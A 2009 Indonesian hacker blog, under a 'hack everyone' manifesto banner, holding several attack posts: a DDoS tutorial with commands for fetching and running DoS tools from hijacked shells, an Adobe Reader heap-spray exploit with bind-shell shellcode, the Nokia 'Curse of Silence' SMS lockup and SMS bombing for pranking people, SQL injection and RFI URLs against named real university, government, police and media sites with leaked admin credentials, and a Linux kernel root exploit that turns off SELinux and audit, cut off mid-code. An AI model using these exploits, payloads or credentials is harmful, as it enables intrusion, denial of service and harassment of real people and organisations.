_____  __     _____  ___    _____  ___    _____  _____  _____  _____  _____  _____    _____  _____    ____   _____  _ _ _  _____ 
|   __||  |   |  |  ||_  |  |   | || | |  |   __||   __|| __  ||  |  ||   __|| __  |  |     ||   __|  |    \ |     || | | ||   | |
|   __||  |__ |  |  | _| |_ | | | ||_  |  |__   ||   __||    -||  |  ||   __||    -|  |-   -||__   |  |  |  ||  |  || | | || | | |
|_____||_____| \___/ |_____||_|___|  |_|  |_____||_____||__|__| \___/ |_____||__|__|  |_____||_____|  |____/ |_____||_____||_|___|
               I DONT WANT TO BE FAME , I DONT WANT TO BE ANY EZINE , I JUST WANT TO SHARE KNOWLEDGE 
	 						
							                                  , ----.       ~ Fuck full-disclosure
							                              -  -     `        ~ Fuck the security industry
							                        ,__.,'           \      ~ Keep 0days private
							                      .'                 *`     ~ Hack everyone you can and then hack some more
							                     /       |   |     / **\    ~ Blend in.
							                    .                 / ****.   ~ Get trusted.
							                    |    mm           | ****|   ~ Trust no one.
							                     \                | ****|   ~ Own everyone.
							                      ` ._______      \ ****/   ~ Disclose nothing.
							                               \      /`---'    ~ Destroy everything.
							                                 \___(          ~ Take back the scene
							                                 /~~~~\         ~ Never sell out, never surrender.
							                                /      \        ~ Get in as anonymous, Leave with no trace.
							                               /      | \       ~ This your Fucking IP 
							                              |       |  \      ~ This your Fucking ISP  
							                    , ~~ .    |, ~~ . |  |\     ~ FUCK OFF I've got enough friends !!!!
							                   ( |||| )   ( |||| )(,,,)`    
							                  ( |||||| )-( |||||| )    | ^
							                  ( |||||| ) ( |||||| )    |'/
							                  ( |||||| )-( |||||| )___,'-
							                   ( |||| )   ( |||| )
							                    ` ~~ '     ` ~~ '











 



    

      
[ Blog ]
      

      
[ History ]
    
    

      


      





DDOS

kali ini vina akan bahas topict tentang ddos ,

ddos ( Distributed denial of service ) itu merupakan serangan yang digunakan untuk menghabiskan bandiwith si korban .


kebanyakan attacker sudah mempersiapkan jumlah server untuk menyerang traffict si korban.

adapun juga si attacker sudah memiliki zombie, untuk melakukan aksinya.


vina akan bahas sedikit konsepnya .

-> penggunaan zombie

ini adalah hal paling terparah di sepanjang ilmu networking, zombie bisa di bilang adalah sebuah mesin yang bisa di pakai oleh attacker untuk memanfaatkan source.
biasanya zombie sudah menginfeksi jutaan pc di dalam negri, zombie itu sendiri termasuk golongan trojan. hmmm..

-> question <-   
apakah komputer kita bisa terinfeksi zombie ?

-> answer <-   
ya bisa saja komputer anda terinfeksi zombie, dikarenakan zombie tidak bisa di liat oleh kasat mata, liat saja traffict" yang mencurigakan di dalam pc kita , mungkin ada autoupdate atau dimana kita melakukan perintah "ps-aux" , banyak listen port yang melaju ke jaringan kita,

-> question <-   
bagaimana kita bisa membuat zombie

-> answer <-
untuk membuat zombie dan menginfeksikan ke korban, kita cukup membuat malware sederhana, teknik bervariant , antaralain , kita bisa kirimkan ke korban tool / software kecil yang sudah kita sisipi malware. ataupun kita bisa melakukan fake action, semacam membuat malware dan menyisipi script *berbahaya ke dalam pdf,mp3,video,ataupun document yang memiliki turunan IIS.  atau anda bisa cek di situs http://www.trojanlibrary.net/ 

-> question <-   
bagaimana cara kita melakukan ddos ?

-> answer <-   
bermacam" pola penyerangan untuk melakukan hal ini ,

1. serangan lewat bot dalam IRC  
2. serangan dengan memanfaatkan source kita sendiri  
3. serangan dengan memanfaatkan source server

-> question <-

bisa anda berikan sedikit contoh untuk melakuakan hal tersebut

-> answer <-   
saya akan berikan sedikit contoh cara melakuakan dos pada source kita dan source server. 

1) dos dengan memanfaatkan source kita sendiri   -> adapun teknik yang lazim . kita cukup melakukan flood request ke korban
contoh "ping" . ping berarti kita memanggil server korban . bilamana kita terus
menerus melakukan permintaan / request secara terus menerus. dan jika server tidak
kuat , makan akan mengakibatkan server crash.

contoh : r00t3d$> ping -l 86600 ipkorban

teknik ini bisa di bilang " Ping of Death Attack "

2) dos dengan memanfaatkan server luar

-> mungkin sudah banyak yang mengetahui teknik ini. dengan cara memanfaatkan shell
dari server hasil injekan. kalian bisa saja menggunakan banyak xpl nya disini
http://packetstorm.linuxsecurity.com/DoS/
atau disini
http://ripperzcrewz.wordpress.com/dos-and-ddos-tools/
pilihlah sesuka hati kalian

#serangan dalam shell.
contoh : buka shell kalian , lalu download source ini
   wget http://packetstorm.linuxsecurity.com/DoS/ascend-foo.c
   compile dulu source nya . atau rubah perm menjadi 777 agar bisa di
   eksekusi  " $gcc -o ascend-foo.c ascend-foo
   lakukan serangan ^_^

#serangan dalam server ssh
contoh : login ke shell kalian, lalu download source nya disini
   wget http://packetstorm.linuxsecurity.com/DoS/udp.pl
   compile dulu source nya . atau rubah perm menjadi 777 agar bisa di
   lakukan serangan , ^_^ bilamana shell kita tidak mensupport perl, lakukan
   perubahan permition .
contoh




-> question <-   

apakah kita bisa mengantisipasi serangan tersebut ?


-> answer <-   
mungkin anda bisa membaca postingan vina sebelumnya di http://elv1n4.blogspot.com/2009/05/ko-with-ddos-attack_9264.html  


 -> question <-      

ok terimakasih ^_^

-> answer <- 

ya sama" ^_^
Labels: Catatan Si Vina Newbie


On 12/9/09 at 

2:46 PM




Reversing JavaScript Shellcode
//##############
//Exploit made by Arr1val
//Proved in adobe 9.1 and adobe 8.1.4 on linux
//
//Steps:
//- create a pdf with an annotation (a note) (i used an annotation with a very long AAAAA name, but that might be omitted)
//- attach the following script to the OpenAction of the pdf.
//##############

var memory;
function New_Script()
{

//if(adobe9)//adobe reader 8 works also with app.setTimeOut?
var startwith = app.alert('Hi');//required for adobe9

    var nop = unescape("%u9090%u9090"); //long nop will also force the address to go to 0x90909090 so 2 steps in one ;)
    var shellcode = unescape( "%uc92b%ue983%ud9eb%ud9ee%u2474%u5bf4%u7381%u1313%u2989%u8357%ufceb%uf4e2%u5222%u147a%ue340%u3d2b%ud175%udeb0%u44f2%uc1a9%udb50%u3f4f%ud502%u044f%u689a%u3143%ud94b%u0178%u689a%ud7e4%uefa3%ub4f8%u09de%u057b%uca45%ub6a0%uefa3%ud7e4%ue380%u0e2b%ub6a3%ud7e4%uf05a%ue7d0%udb18%u7841%ufa3c%u3f41%ueb3c%u3940%u6a9a%u047b%u689a%ud7e4"); //linux bind shell at port 4444

    while(nop.length <= 0x100000/2) nop+=nop;
    nop=nop.substring(0,0x100000/2 - shellcode.length);

    memory=new Array();
    for(i=0;i<0x6ff;i++)  //we should at least overwrite 0x90909090
    {memory[i]=nop + shellcode;}

//start exploit now
start();

function start()
{
    this.getAnnots(-134217728,-134217728,-134217728,-134217728);
}

}

//############################

# milw0rm.com [2009-04-29]

=========================
caranya 

-> download spidermonkey di mozilla sehingga dia bisa membuat 2 log berbeda 
-> save code ini dan beri nama dengan nama crap2shellcode.pl extensi perl (pl) 

#!/bin/perl
#
# crap2shellcode  - 11/9/2009 Paul Melson
#
# This script takes stdin from some ascii dump of shellcode
# (i.e. unescape-ed JavaScript sploit) and converts it to
# hex and outputs it in a simple C source file for debugging.
#
# gcc -g3 -o dummy dummy.c
# gdb ./dummy
# (gdb) display /50i shellcode
# (gdb) break main
# (gdb) run
#

use strict;
use warnings;

my $crap;
while($crap=) {
  my $hex = unpack('H*', "$crap");

  my $len = length($hex);
  my $start = 0;

  print "#include \n\n";
  print "static char shellcode[] = \"";

  for (my $i = 0; $i < length $hex; $i+=4) {
    my $a = substr $hex, $i, 2;
    my $b = substr $hex, $i+2, 2;
    print "\\x$b\\x$a";
  }
  print "\";\n\n";
}

print "int main(int argc, char *argv[])\n";
print "{\n";
print "  void (*code)() = (void *)shellcode;\n";
print "  code();\n";
print "  exit(0);\n";
print "}\n";
print "\n";

-> hasil dari crap2shellcode.pl adalah shellcode.c , maka untuk menjalankan kita harus mengcompile karena shellcode itu memiliki bahasa C 
contoh : gcc -g3 shellcode.c -o shellcode 

-> running process 
contoh
mainr00t@r00t$./shellcode
mainr00t@r00t$ display /50i shellcode
mainr00t@r00t$ break main
mainr00t@r00t$ run
Labels: Catatan Si Vina Newbie


 at 

3:20 AM




DDOS on Symbian
inilah kelemahan [bugs] ponsel symbian  jaman dulu . 
klo ga salah dulu tahun 2007-2008 lagi maraknya phreaking, sampai" orang bisa coba melakukan bombing sms , dengan memanfaatkan vendor bakrie , kenapa . karena bakrie cuma 1 perak /messege . jadi tinggal kamu connectin ponsel pake kabel dku yang support sama ponselmu. dan pake pc suit . lalu bombing si target terus menerus . lalu beranjak serangan VOIP , sampe ada orang yang niat bikin tools buat kacauin lalu lintas VOip . klo ga salah namanya tuh tools " Voip War" . dan pertengahan tahun pihak nokia kecolongan , sampe" terdapat bugs pada SMS nya . ada" aja . sms bisa sampe restart ponsel oranglain .

ayoo kita coba kembangkan kelemahan dalam nokia ponsel N dan S series
ternyata di selidik demi selidik ponsel nokia memiliki bugs dalam aplikasi messenger / sms
ternyata dengan mengirimkan 1 buah pesan pada korban,
dan ketika korban membuka pesan itu, maka handphone otomatis merestart sendiri
heueheuehue :P
lumayan klo masih bisa di coba. buat isengin temen yang sombong dengan ponselnya :D


catatan ponsel yang bisa terkena serangan ini

====================================================
S60 3rd Edition, Feature Pack 1 (S60 3.1) ( fixed ) 
Nokia E90 Communicator  ( Fixed ) 
Nokia E71 ( fixed ) 
Nokia E66 ( fixed )
Nokia E51
Nokia N95 8GB
Nokia N95
Nokia N82 ( fixed )
Nokia N81 8GB
Nokia N81
Nokia N76
Nokia 6290
Nokia 6124 classic
Nokia 6121 classic
Nokia 6120 classic
Nokia 6110 Navigator
Nokia 5700 XpressMusic

S60 3rd Edition, initial release (S60 3.0):
Nokia E70 ( fixed ) 
Nokia E65 ( fixed ) 
Nokia E62
Nokia E61i
Nokia E61
Nokia E60
Nokia E50
Nokia N93i
Nokia N93
Nokia N92
Nokia N91 8GB
Nokia N91
Nokia N80
Nokia N77
Nokia N73
Nokia N71
Nokia 5500
Nokia 3250

S60 2nd Edition, Feature Pack 3 (S60 2.8):
Nokia N90
Nokia N72
Nokia N70

S60 2nd Edition, Feature Pack 2 (S60 2.6):
Nokia 6682
Nokia 6681
Nokia 6680
Nokia 6630


==============================

persaratan untuk melakukan serangan

==============================

- MSISDN / no ponsel target 
- mobile phone contract dikirimkan ke SMS messages

===============================

dampak dari serangan

===============================

handphone korban tidak dapat menerima sms / mms pada siapapun
handphone harus di reset kembali ke dalam pabrikan
bilamana terjadi DDOS pada serangan ini , maka ponsel akan mati total

===============================

ringkasan serangan

===============================
Email dapat dikirim melalui SMS dengan mengatur pesan Protokol Identifier
untuk "Internet Electronic Mail" dan memformat pesan seperti ini:

  

Jika pesan tersebut mengandung  dengan lebih dari 32
karakter, S60 2.6, 2.8, 3.0 dan 3,1 perangkat tidak dapat menerima
lain pesan SMS atau MMS lagi. 2,6 dan 3,0 kunci perangkat setelah
hanya satu pesan, 2,8 dan 3,1 perangkat setelah 11 pesan.


dalam 3GPP TS 23,040 menentukan sebuah metode untuk mengirimkan email melalui SMS di
Bagian 3.8 ( "SMS dan Internet Electronic Mail interworking"). Dalam
bentuk yang paling dasar, seperti pesan SMS dimulai dengan dari-(MT-SMS) atau
ke-email-address (MO-SMS), diikuti oleh karakter spasi, dan kemudian
badan pesan. TP-Procotol-Identifier dari pesan SMS harus
set ke "Internet Electronic Mail" (nilai: 50 / 0x32).

Hal ini tidak ditentukan bagaimana pesan tersebut harus ditampilkan bila
diterima oleh telepon. Sebelum S60 2.6, perangkat Series60 ditampilkan seperti
pesan persis seperti mereka dikirim. Dimulai dengan S60 2.6, ketika
bagian dari pesan yang harus berisi alamat dari tampak
hal seperti alamat email (yakni berisi "@" di suatu tempat),
alamat ini kemudian ditampilkan sebagai pengirim pesan daripada
biasanya ditunjukkan TP-Originating-Address.

Jika alamat email ini lebih panjang dari 32 karakter, Series60 2.6, 2.8,
Perangkat 3,0 dan 3,1 gagal untuk menampilkan pesan atau memberikan indikasi
pada antarmuka pengguna bahwa pesan telah diterima. Mereka lakukan,
Namun, sinyal ke SMSC bahwa mereka menerima pesan dengan mengirimkan
sebuah RP-ACK.

Menjalankan perangkat S60 2,6 atau 3,0 tidak akan dapat menerima lain
Pesan SMS setelah itu. Antarmuka pengguna tidak memberikan
indikasi dari situasi ini. Satu-satunya tindakan untuk memperbaiki situasi ini
tampaknya merupakan Factory Reset perangkat (dengan memasukkan "* # 7370 #").

Menjalankan perangkat S60 2,8 atau 3,1 bereaksi sedikit berbeda: Mereka tidak
lock up sampai mereka menerima setidaknya 11 SMS-pesan email dengan
alamat email yang lebih panjang dari 32 karakter. Perangkat tidak
dapat menerima pesan SMS lain setelah itu - setelah menerima
pesan berikutnya, telepon hanya akan menampilkan peringatan bahwa terdapat
tidak cukup memori untuk menerima pesan dan yang lebih jauh data harus
dihapus terlebih dahulu. Pesan ini bahkan ditampilkan pada sebaliknya
benar-benar "kosong" perangkat.

Setelah mematikan telepon dan lagi, ia memiliki kemampuan terbatas
untuk menerima pesan SMS lagi: Jika menerima pesan SMS yang
dibagi menjadi beberapa bagian (3GPP TS 23,040, 9.2.3.24.1 Concatenated
Short Messages) itu hanya dapat menerima bagian pertama dan akan
menampilkan "tidak cukup memori" peringatan lagi. Setelah powercycling yang
perangkat lagi, hal itu dapat menerima bagian kedua. Jika ada ketiga
bagian, itu harus powercycled lagi, dan seterusnya.

Juga, penyerang sekarang hanya perlu mengirim satu lagi "Curse Of Silence"
pesan untuk mengunci telepon lagi. Dengan selalu mengirim satu lagi
segera setelah laporan status pengiriman pesan sebelumnya
diterima, penyerang dapat sepenuhnya mencegah target dari
lain menerima SMS / MMS pesan.

Hanya Pabrik Mengatur ulang perangkat akan mengembalikan pesan penuh
menerima kemampuan. Perhatikan bahwa, jika cadangan dibuat menggunakan Nokia
PC-Suite * setelah * diserang, pesan blocking juga
backup dan akan dikirim ke perangkat lagi ketika memulihkan
cadangan setelah Factory Reset.

Perhatikan bahwa tidak dapat menerima pesan SMS juga berarti tidak
dapat menerima pesan MMS, karena mereka memberi tanda dengan mengirimkan
Pesan SMS ke perangkat.

serangan pesan ini dihasilkan dengan telepon atau
selular modem yang mendukung 3GPP TS 27,005 AT perintah dan dengan paling
Ponsel Nokia juga langsung dari antarmuka pengguna. Sebagai contoh, pada
Perangkat S60, ketika dalam editor pesan, jenis pesan dapat
akan beralih ke "E-mail" di bawah "Options" -> "Pilihan pengiriman" ->
"Pesan dikirim sebagai". 6310i nyaman yang menawarkan "Menulis email" menu
entri pada menu pesan.

Bentuk yang paling sederhana konten untuk Kutukan Dari Diam akan menjadi sesuatu
seperti "123456789@123456789.1234567890123" (angka yang digunakan hanya untuk
menggambarkan panjang "alamat email" dari lebih dari 32
karakter). Perhatikan ruang pada akhir pesan! 



tapi pada awal tahun 2009 , pihak nokia telah meperbaiki kesalahan itu . 
selengkapnya bisa kalian baca disini 

http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml?articleID=212903359

wadoww.. tahun 2009 ? coba deh pada ponsel tahun 2009 kebawah . atau coba target ke tipe motoQ . 


silahkan di explore sendiri
Labels: Catatan Si Vina Newbie


On 11/17/09 at 

11:50 PM




SmS bomb
heuehue :P

udahlama ga bombing" oranglain :D
teknik sms berantai dengan waktu yang sama ini mungkin agak terlalu over banget
soalnya kasian tuh yang kena sms bombnya
waktu dia mau buka sms , ternyata layanan inboxnya penuh ,
dan ketika di 1 pesan di hapus , makan pesan yang kita bombingnya akan terus menerus sampai handphone nya rusak / batere ponsel korban bisa ngedrop :P
nih vina kasih sedikit trik buat kalian yang mau jahil . tapi inget kan ini hanya untuk pembelajaran
hack to learn no be learn to hack . ok ;)
mari kita lanjutkan

=======================================================

persaratannya ini

=======================================================

hardware :
- Kabel dku-5 atau dku-2
- hp support dku-5 (3100,6100,3120,6610,etc) atau hp support dku-2 (7610,3230,6630,n70,etc)
- nomor hp victim ( lebih enak nomor victim THREE 3 ...sms sesama 3 gratis, atau bisa pake esia 1perak/messege :)) hahahahahha )
- nomor yng pulsanya masih full ..( 100 rb jadi lah :)) heueheue :P

software:
- pc suite nokia

cara:
- setelah tersambung hp dngan comp..ambil nokia text message editor
- isi to : dng nomor viktim secara berulang
- isi text terserah anda......
- klik send (berulang2)

=============================================================

bayangkan 1000 sms di kirim dalam waktu yang sama ke hp anda , apa yang terjadi
1000sms = 1000 perak = esia memang untuk anda :)) heueheu :P





tHx 

elv1n4
Labels: Catatan Si Vina Newbie


 at 

6:59 AM




Again, Indonesia Admin Site System Can not Fix The Vulnerability
It's almost 2 year Vuln On Multiple Sites University of Indonesia, and yet the government fix,
Where Are you Admin?
Relax and Sleep That You Work.
hmm ...
Maybe You Never Know The existence of attack that can be done by outsiders, Like Doing Data Manipulation, Changing Views, Even Removing All Server Data Until You Server will be Down,

Look here some sensitive cases,

======================
# Indonesian University Site #
======================

http://www.akademik.pasca.unpad.ac.id/
http://www.pps.fisip.unpad.ac.id/
http://www.uinjkt.ac.id/
http://www.unhas.ac.id/
http://www.unikom.ac.id/
http://www.upi.ac.id/
http://www.trisakti.ac.id/
http://ftip.unpad.ac.id
======================

Example ::

[universitas padjajaran bandung]

http://akademik.pasca.unpad.ac.id/
=======================================================
Nama Server: Apache/2.2.3 (Fedora). PHP/5.1.6
System : Linux pps2.unpad.ac.id 2.6.18-1.2798.fc6 #1 SMP Mon Oct 16 14:37:32 EDT 2006 i686
uid=48(apache) gid=48(apache) groups=48(apache)
========================================================

If That Site Have Bugs, ,, Whats Next ?? Wannabe :)) LoL .
-> RFI ATTACK
========================================================
http://akademik.pasca.unpad.ac.id/pasca/index.php?dir=http://www.a1e.es/templates/beez/vina.txt??
========================================================
Belive Me , this Site Have Been Powned .
Like This

http://akademik.pasca.unpad.ac.id/daftar_ver1/dir_uploads/waw.txt

Woo00psss...
I can make a student value manipulation, even I can make this site down..


Example II

http://www.trisakti.ac.id

username : admin
password : 662d187d55d6c5491f6619d99971dc74
email    : admin@trisakti.ac.id


Example III

http://www.stikom.edu

http://www.stikom.edu/v8/main.php?act=inf&goto=agd&id=-231+union+select+all+null,null,null,concat%28LOGIN,char%2858%29,PASSWD%29,EMAIL,null+from+user--


=======================================================
Ok Lets Tested Some Goverment Site ;)
=======================================================

http://Jakarta.go.id
http://bandung.go.id
http://utara.jakarta.go.id
http://kpu.go.id
http://www.djfm.co.id
http://www.petrokimia-gresik.com
http://www.ali.web.id
http://www.corbuziershop.com/

=======================================================
Example ::

http://Jakarta.go.id

Joomla --"

Lets see :

http://www.jakarta.go.id/v62/hah.txt

=======================================================
ok Lets Tested Entertaiment Site
=======================================================

www.indosiar.com
www.rcti.tv
www.an.tv
www.antvsports.com
www.sctv.co.id

=======================================================

Example ::

ANTV SITE
www.an.tv (SQLi)

http://www.an.tv/s/index.php?sid=5+AND+1=2+UNION+SELECT+load_file(0x2f6574632f706173737764),1--

http://www.an.tv/s/index.php?sid=5+AND+1=2+UNION+SELECT+concat(user,0x3a,password),1+FROM+mysql.user--

Lets See ..
Whats Next ?? Wannabe ? Lol :))

if you hate this site , i'll give you free...
taste it
======================
http://www.an.tv/cms

username : administrator
password : admin!@#123
email : nini@an.tv
======================
http://antvsports.com/cms

username : admin
password : admin123

======================

http://ww1.indosiar.com/investor/admin/

uname : admininvestor
password : password


======================================================
Lets Test The Comercial Site
======================================================

http://www.corbuziershop.com
http://www.wtcsby.com
http://www.fajar.co.id
http://www.jamsostek.co.id/
http://bjh.co.id/
=====================================================

example : corbuziershop.com (SQLi)

http://www.corbuziershop.com/shop/index.php?page=showproduct&id=-362+AND+1=2+UNION+SELECT+null,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*


example II : trubus

http://www.trubus-online.co.id/mod.php?mod=publisher&op=viewarticle&cid=4&artid=-1190%20union%20select%201,2,3,4,5,group_concat%28name,0x3a,pwd%29,7,8,9,10%20from%20authors--

example III : balita

http://info.balitacerdas.com/mod.php?mod=publisher&op=viewarticle&artid=-45%20union%20select%201,2,3,version%28%29,5,group_concat%28name,0x3a,pwd%29,7,8,9,10,11%20from%20authors--

example 4 :

http://www.tigapilar.org/mod.php?mod=publisher&op=viewarticle&cid=5&artid=-762%20union%20select%201,2,3,4,5,group_concat(name,0x3a,pwd),7,8,9,10%20from%20authors--

=======================================================
Ok Lets Test Goverment Police Site
======================================================
http://polri.go.id
http://lodaya.web.id
http://interpol.go.id
http://tni.mil
http://www.lantas.metro.polri.go.id
======================================================

Lets See ..

www.polri.go.id ( XSS )

http://www.polri.go.id/indexwide.php?op=perundangan&type=00&subtype=1%3E%22%3E%3CScRiPt%20%0D%0A%3Ealert%28440221011283%29%3B%3C/ScRiPt%3E




Next Lantas Polri
Taste ByYourself

http://www.lantas.metro.polri.go.id/intranet/
Username : Xploit
password : Xploit00

=====================================================

iam sorry iam not hacker too, but i wanna be ^_^
Maybe It is a little example, which can be used as a lesson for all.
For More Information , Please Contact Me , Feel Free !!


Thnx

./elv1n4
Labels: Catatan Si Vina Newbie


On 11/4/09 at 

12:16 AM




cheddar_bay xpl ^_^
-----------cute here ---------------------------
#!/bin/sh

killall -9 pulseaudio
if [ ! -f '/usr/sbin/getenforce' ]; then
 ./pwnkernel
else
 RESULT=`/usr/sbin/getenforce`
 if [ "$RESULT" != "Disabled" ]; then
   pulseaudio --log-level=0 -L /home/spender/exploit.so
 else
   ./pwnkernel
 fi
fi


------------paste here -------------------------------------

save file cheddar_bay.sh


-----------cute here------------------------------------------

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

/* on 2.6.30:
  sk_sndbuf is at 0x68
  sk_wmem_alloc is at 0x60
  sk_socket is at 0x140
  the above can change based on kernel configuration, blahblah
  I couldn't bother to recompile and compute the other sizes so kiddies
  may have to reduce the size of gibberish2 a bit

  flags is at offset 0x8 in sk_socket (on 2.6.30, on the RHEL5 2.6.18
                                       it's at offset 0x4)
*/

#ifdef RHEL5_SUCKS
#define OFFSET_OF_FLAGS 0x4
#else
#define OFFSET_OF_FLAGS 0x8
#endif

struct sock {
   char gibberish1[0x60];
#ifdef RHEL5_SUCKS
   char gibberish2[0xb0]; // this seems to do the trick ;)
#else
   char gibberish2[0xe0]; // gotta make sure this >> 1 is not >= above
#endif
   unsigned long gibberish3[0x50];
};

static void craft_sock(struct sock *sk, unsigned long target_addr)
{
   int i;
   memset(sk->gibberish1, 0, sizeof(sk->gibberish1));
   memset(sk->gibberish2, 0, sizeof(sk->gibberish2));
   for (i = 0; i <>gibberish3)/sizeof(sk->gibberish3[0]); i++)
       sk->gibberish3[i] = target_addr - OFFSET_OF_FLAGS;
}

static void or_one_to_kernel_address(unsigned long target_addr)
{
   struct sock *sk = NULL;
   int fd;
   struct pollfd pfd;

   craft_sock(sk, target_addr);

   fd = open("/dev/net/tun", O_RDWR);
   if (fd == -1) {
       fprintf(stdout, "UNABLE TO OPEN /dev/net/tun!\n");
       return;
   }
   pfd.fd = fd;
   pfd.events = POLLIN | POLLOUT;
   poll(&pfd, 1, 0);

   close(fd);

   fprintf(stdout, " [+] *%p |= 1\n", (void *)target_addr);
}

static unsigned long get_kernel_sym(char *name)
{
   FILE *f;
   unsigned long addr;
   char dummy;
   char sname[256];
   int ret;

   f = fopen("/proc/kallsyms", "r");
   if (f == NULL) {
       fprintf(stdout, "Unable to obtain symbol listing!\n");
       exit(0);
   }

   ret = 0;
   while(ret != EOF) {
       ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
       if (ret == 0) {
           fscanf(f, "%s\n", sname);
           continue;
       }
       if (!strcmp(name, sname)) {
           fprintf(stdout, " [+] Resolved %s to %p\n", name, (void *)addr);
           fclose(f);
           return addr;
       }
   }

   fclose(f);
   return 0;
}

/* fastcalls! */
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef int __attribute__((regparm(3))) (*_nf_unregister_hooks)(unsigned long *ops, int count);
typedef int __attribute__((regparm(3))) (*_unregister_filesystem)(unsigned long arg);

unsigned long *tun_mmap_fop;

unsigned long sel_fs_type;

unsigned long *mmap_min_addr;

int *audit_enabled;

int *ss_initialized;

int *selinux_enforcing;
int *selinux_enabled;
int *selinux_mls_enabled;

int *sel_enforce_ptr;

int *apparmor_enabled;
int *apparmor_logsyscall;
int *apparmor_audit;
int *apparmor_complain;

unsigned long *security_ops;
unsigned long default_security_ops;

unsigned long sel_read_bool;
unsigned long security_get_bool_value;
unsigned long sel_read_enforce;

_commit_creds commit_creds;
unsigned long init_cred;

_nf_unregister_hooks nf_unregister_hooks;
unsigned long * selinux_ipv4_ops;
unsigned long * selinux_ipv6_ops;

_unregister_filesystem unregister_filesystem;

int what_we_do;

unsigned int our_uid;

int got_root;

/* for RHEL5 2.6.18 with 4K stacks */
static inline unsigned long get_current(void)
{
   unsigned long current;

   asm volatile (
   " movl %%esp, %%eax;"
   " andl %1, %%eax;"
   " movl (%%eax), %0;"
   : "=r" (current)
   : "i" (0xfffff000)
   );
   return current;
}

static void old_style_gimme_root(void)
{
   unsigned int *current;
   unsigned long orig_current;

   current = (unsigned int *)get_current();
   orig_current = (unsigned long)current;

   while (((unsigned long)current < (orig_current + 0x1000)) &&         (current[0] != our_uid || current[1] != our_uid ||          current[2] != our_uid || current[3] != our_uid))         current++;      if ((unsigned long)current >= (orig_current + 0x1000))
       return;

   current[0] = current[1] = current[2] = current[3] = 0; // uids
   current[4] = current[5] = current[6] = current[7] = 0; // gids

   got_root = 1;

   return;
}


static int __attribute__((regparm(3))) own_the_kernel(void *a, void *b)
{
   // clean up after ourselves ;)
   if (tun_mmap_fop)
       *tun_mmap_fop = 0;

   if (audit_enabled)
       *audit_enabled = 0;

   // giggles
   //if (mmap_min_addr)
   //    *mmap_min_addr = 0;

   // disable apparmor
   if (apparmor_enabled && *apparmor_enabled) {
       what_we_do = 1;
           *apparmor_enabled = 0;
       if (apparmor_audit)
           *apparmor_audit = 0;
       if (apparmor_logsyscall)
           *apparmor_logsyscall = 0;
       if (apparmor_complain)
           *apparmor_complain = 0;
   }

   // disable SELinux
   if (selinux_enforcing && *selinux_enforcing) {
       what_we_do = 2;
       *selinux_enforcing = 0;
   }

   if (!selinux_enabled || selinux_enabled && *selinux_enabled == 0) {
       // trash LSM
       if (default_security_ops && security_ops) {
           if (*security_ops != default_security_ops)
               what_we_do = 3;
           *security_ops = default_security_ops;
       }
   }

   /* make the idiots think selinux is enforcing */
   if (sel_read_enforce || (sel_read_bool && security_get_bool_value)) {
       unsigned char *p;
       unsigned long _cr0;

       asm volatile (
       "mov %%cr0, %0"
       : "=r" (_cr0)
       );
       _cr0 &= ~0x10000;
       asm volatile (
       "mov %0, %%cr0"
       :
       : "r" (_cr0)
       );
       if (sel_read_enforce) {
       if (sizeof(unsigned int) != sizeof(unsigned long)) {
           /* 64bit version, look for the mov ecx, [rip+off]
              and replace with mov ecx, 1
           */
           for (p = (unsigned char *)sel_read_enforce; (unsigned long)p < (sel_read_enforce + 0x30); p++) {                 if (p[0] == 0x8b && p[1] == 0x0d) {                     p[0] = '\xb9';                     p[5] = '\x90';                     *(unsigned int *)&p[1] = 1;                     goto and_now;                 }             }         } else {             /* 32bit, replace push [selinux_enforcing] with push 1 */             for (p = (unsigned char *)sel_read_enforce; (unsigned long)p < (sel_read_enforce + 0x20); p++) {                 if (p[0] == 0xff && p[1] == 0x35) { #ifdef RHEL5_SUCKS                     // while we're at it, disable                     // SELinux without having a                     // symbol for selinux_enforcing ;)                     sel_enforce_ptr = *(unsigned int **)&p[2];                     *sel_enforce_ptr = 0;                     what_we_do = 2; #endif                     p[0] = '\x68';                     p[5] = '\x90';                     *(unsigned int *)&p[1] = 1;                     goto and_now;                 }             }         }         } and_now:         /*         if (sel_read_bool && security_get_bool_value) {         for (p = (unsigned char *)sel_read_bool; (unsigned long)p < (sel_read_bool + 0x300); p++) {             if (p[0] == 0xe8 && (((unsigned long)&p[5] + *(int *)&p[1]) == security_get_bool_value)) {                 *p = '\xa1';                 *(unsigned int *)(p + 1) = 1;                 goto next_part;             }         }         } next_part:         */         _cr0 |= 0x10000;         asm volatile (         "mov %0, %%cr0"         :         : "r" (_cr0)         );     }     /*     if (nf_unregister_hooks) {         if (selinux_ipv4_ops && *selinux_ipv4_ops) {             nf_unregister_hooks(selinux_ipv4_ops, 3);             *selinux_ipv4_ops = 0;         }         if (selinux_ipv6_ops && *selinux_ipv6_ops) {             nf_unregister_hooks(selinux_ipv6_ops, 2);             *selinux_ipv6_ops = 0;         }     }     */         //if (unregister_filesystem && sel_fs_type)     //    unregister_filesystem(sel_fs_type);      /* and now give ourselves full privileges */     if (commit_creds && init_cred) {         /* hackish usage increment */         *(volatile int *)(init_cred) += 1;         commit_creds(init_cred);         got_root = 1;     } #ifdef RHEL5_SUCKS      else {         // must be RHEL5 2.6.18         old_style_gimme_root();     } #endif      return -1; }  static void boom_goes_the_dynamite(void) {     char *mem;     int fd;      fprintf(stdout, " [+] b00m!\n");      fd = open("/dev/net/tun", O_RDONLY);      mem = mmap(NULL, 0x1000, PROT_READ, MAP_PRIVATE, fd, 0);      close(fd);      return; }  int pa__init(void *m) {     char *mem;     int fd;     int ret;      our_uid = getuid();      /* open it so we can have it auto-loaded and resolve its symbols        below     */     fd = open("/dev/net/tun", O_RDONLY);     if (fd == -1) {         fprintf(stdout, "UNABLE TO OPEN THE DEVICE!\n");         return 1;     }     close(fd);      if ((personality(0xffffffff)) != PER_SVR4) {         mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);         if (mem != NULL) {             fprintf(stdout, "UNABLE TO MAP ZERO PAGE!\n");             return 1;         }     } else {         ret = mprotect(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);         if (ret == -1) {             fprintf(stdout, "UNABLE TO MPROTECT ZERO 